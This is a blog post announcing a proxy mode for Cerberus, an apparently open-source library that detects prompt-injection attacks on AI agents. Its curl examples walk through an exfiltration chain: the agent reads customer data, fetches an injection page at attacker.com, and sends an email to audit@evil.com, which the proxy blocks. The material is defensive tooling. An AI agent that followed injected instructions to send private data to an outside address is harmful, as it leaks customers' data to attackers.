Zero-Code-Change AI Security: Cerberus Now Runs as an HTTP Proxy

#security #ai #opensource #cybersecurity

Most security tooling asks you to change your agent's code. Wrap this, extend that, swap your tool executor. If you're deep in a LangChain or OpenAI Agents setup that's already running in prod, that's friction.

New in Cerberus: proxy/gateway mode. Same detection, zero changes to your agent.

How it works

Instead of wrapping your executors with guard(), you spin up a Cerberus proxy and route your agent's tool calls through it:

import { createProxy } from '@cerberus-ai/core';

const proxy = createProxy({
  port: 4000,
  cerberus: { alertMode: 'interrupt', threshold: 3 },
  tools: {
    readCustomerData: {
      target: 'http://localhost:3001/readCustomerData',
      trustLevel: 'trusted',
    },
    fetchWebpage: {
      target: 'http://localhost:3001/fetchWebpage',
      trustLevel: 'untrusted',
    },
    sendEmail: {
      target: 'http://localhost:3001/sendEmail',
      outbound: true,
    },
  },
});

await proxy.listen(); // port 4000

Your agent calls POST http://localhost:4000/tool/sendEmail with { "args": {...} } instead of calling the tool server directly. That's the only change.
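
On the agent side, the change amounts to pointing each tool call at the proxy URL. Here is a minimal TypeScript sketch of that request shape, assuming only the /tool/<name> path and the { "args": ... } body described above. The names buildToolRequest and ProxyRequest are hypothetical and not part of @cerberus-ai/core.

```typescript
// Hypothetical helper for illustration; not an export of @cerberus-ai/core.
interface ProxyRequest {
  url: string;
  method: 'POST';
  headers: Record<string, string>;
  body: string;
}

// Builds the HTTP request an agent would send to the proxy for one tool call.
function buildToolRequest(
  proxyBase: string,
  toolName: string,
  args: Record<string, unknown>,
): ProxyRequest {
  // Drop trailing slashes so the path is not doubled up.
  const base = proxyBase.replace(/\/+$/, '');
  return {
    url: `${base}/tool/${encodeURIComponent(toolName)}`,
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ args }),
  };
}

const req = buildToolRequest('http://localhost:4000', 'sendEmail', {
  to: 'user@company.com',
});
```

The resulting url, method, headers, and body can be handed to whatever HTTP client the agent already uses.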

What the proxy returns

Allowed call:

200 { "result": "Email sent to user@company.com" }

Lethal Trifecta detected (L1 + L2 + L3 all fire):

403 { "blocked": true, "message": "[Cerberus] Tool call blocked — risk score 3/4" }

The blocked response also carries an X-Cerberus-Blocked: true header.
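
An agent-side caller will usually want to tell a blocked call apart from an ordinary failure. The sketch below is one way to classify the two responses shown above, using only the status code, the X-Cerberus-Blocked header, and the blocked/message/result fields from this post. ToolOutcome and interpretProxyResponse are hypothetical names, and how other status codes should be handled is an assumption.

```typescript
// Hypothetical client-side types; not part of @cerberus-ai/core.
type ToolOutcome =
  | { kind: 'allowed'; result: unknown }
  | { kind: 'blocked'; message: string }
  | { kind: 'error'; status: number };

function interpretProxyResponse(
  status: number,
  headers: Record<string, string>,
  body: { result?: unknown; blocked?: boolean; message?: string },
): ToolOutcome {
  // HTTP header names are case-insensitive, so compare in lower case.
  const blockedHeader = Object.keys(headers).some(
    (name) => name.toLowerCase() === 'x-cerberus-blocked' && headers[name] === 'true',
  );
  if (status === 403 && (blockedHeader || body.blocked === true)) {
    return { kind: 'blocked', message: body.message ?? 'Tool call blocked' };
  }
  if (status === 200) {
    return { kind: 'allowed', result: body.result };
  }
  // Assumption: anything else is treated as a transport or upstream error.
  return { kind: 'error', status };
}

const allowed = interpretProxyResponse(200, {}, { result: 'Email sent to user@company.com' });
const blocked = interpretProxyResponse(
  403,
  { 'X-Cerberus-Blocked': 'true' },
  { blocked: true, message: '[Cerberus] Tool call blocked' },
);
```

Returning a tagged union keeps the "blocked" case explicit, so the agent can stop the run rather than retry the call.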

The thing that makes this work: session state

The Lethal Trifecta attack pattern isn't a single call; it's a sequence. Turn 1: agent reads private customer data (L1). Turn 2: agent fetches an attacker-controlled page that contains an injection (L2). Turn 3: agent sends an email to an external address with that data in the body (L3). The score reaches 3/4, which meets the configured threshold of 3, so the call is blocked.

In proxy mode, each agent run sends an X-Cerberus-Session header. The proxy maintains independent detection state per session ID, so cumulative scoring works across multiple HTTP requests from the same run. The attack pattern is detected whether you're using guard() inline or routing through the proxy.

curl -X POST http://localhost:4000/tool/readCustomerData \
  -H "X-Cerberus-Session: run-abc123" \
  -H "Content-Type: application/json" \
  -d '{"args": {}}'

200, score 1/4

curl -X POST http://localhost:4000/tool/fetchWebpage \
  -H "X-Cerberus-Session: run-abc123" \
  -H "Content-Type: application/json" \
  -d '{"args": {"url": "https://attacker.com/payload"}}'

200, score 2/4

curl -X POST http://localhost:4000/tool/sendEmail \
  -H "X-Cerberus-Session: run-abc123" \
  -H "Content-Type: application/json" \
  -d '{"args": {"to": "audit@evil.com", "body": ""}}'

403, score 3/4, BLOCKED
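
The three-request walk-through can be modelled as a per-session accumulator. This is an illustrative sketch only: Cerberus's actual detection logic and data structures are not shown in this post, SessionScores is a hypothetical class, and only the three layers named above are modelled (the fourth point implied by the "/4" scale is left out).

```typescript
// Illustrative model, not Cerberus's implementation.
type Layer = 'L1' | 'L2' | 'L3';

class SessionScores {
  // One set of fired layers per session ID, so runs never share state.
  private readonly fired = new Map<string, Set<Layer>>();
  private readonly threshold: number;

  constructor(threshold: number) {
    this.threshold = threshold;
  }

  // Records that a layer fired for a session and reports the running score.
  record(sessionId: string, layer: Layer): { score: number; blocked: boolean } {
    const layers = this.fired.get(sessionId) ?? new Set<Layer>();
    layers.add(layer); // a layer that fires twice still counts once
    this.fired.set(sessionId, layers);
    const score = layers.size;
    return { score, blocked: score >= this.threshold };
  }
}

const scores = new SessionScores(3); // mirrors threshold: 3 in the proxy config
const first = scores.record('run-abc123', 'L1');
const second = scores.record('run-abc123', 'L2');
const third = scores.record('run-abc123', 'L3');
const otherRun = scores.record('run-xyz789', 'L3'); // hypothetical second session
```

Because state is keyed by session ID, the third call in run-abc123 crosses the threshold while the unrelated run starts from zero.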

Under the hood

Pure node:http — zero new dependencies
GET /health → { "status": "ok", "sessions": N } for monitoring
Sessions auto-expire after 30 minutes of inactivity
Supports HTTP upstream targets or local handlers (useful for testing)
733 tests, 98%+ coverage

The proxy joins guard() (inline wrapping) and the framework adapters (LangChain, Vercel AI, OpenAI Agents) as a third integration path. Pick the one that fits where you are.
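
The 30-minute idle expiry and the /health payload listed under "Under the hood" could be backed by something like the store below. This is a sketch under assumptions: IdleSessionStore, touch, sweep, and health are hypothetical names, and the post does not say how or when Cerberus actually evicts sessions.

```typescript
// Hypothetical session store; not Cerberus's implementation.
const IDLE_LIMIT_MS = 30 * 60 * 1000; // 30 minutes of inactivity, per the post

class IdleSessionStore {
  // Session ID mapped to the timestamp (ms) of its most recent request.
  private readonly lastSeen = new Map<string, number>();

  // Call on every request carrying a session ID.
  touch(sessionId: string, now: number): void {
    this.lastSeen.set(sessionId, now);
  }

  // Removes sessions idle for at least IDLE_LIMIT_MS; returns how many were dropped.
  sweep(now: number): number {
    let removed = 0;
    this.lastSeen.forEach((seen, id) => {
      if (now - seen >= IDLE_LIMIT_MS) {
        this.lastSeen.delete(id);
        removed++;
      }
    });
    return removed;
  }

  // Same shape as the GET /health response described above.
  health(): { status: 'ok'; sessions: number } {
    return { status: 'ok', sessions: this.lastSeen.size };
  }
}

const minute = 60 * 1000;
const store = new IdleSessionStore();
store.touch('run-abc123', 0);
store.touch('run-xyz789', 20 * minute);
const dropped = store.sweep(31 * minute); // only run-abc123 has been idle long enough
```

Passing the current time in as a parameter, rather than reading the clock inside the class, keeps the expiry logic easy to test.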

Repo: github.com/Odingard/cerberus
npm: npm install @cerberus-ai/core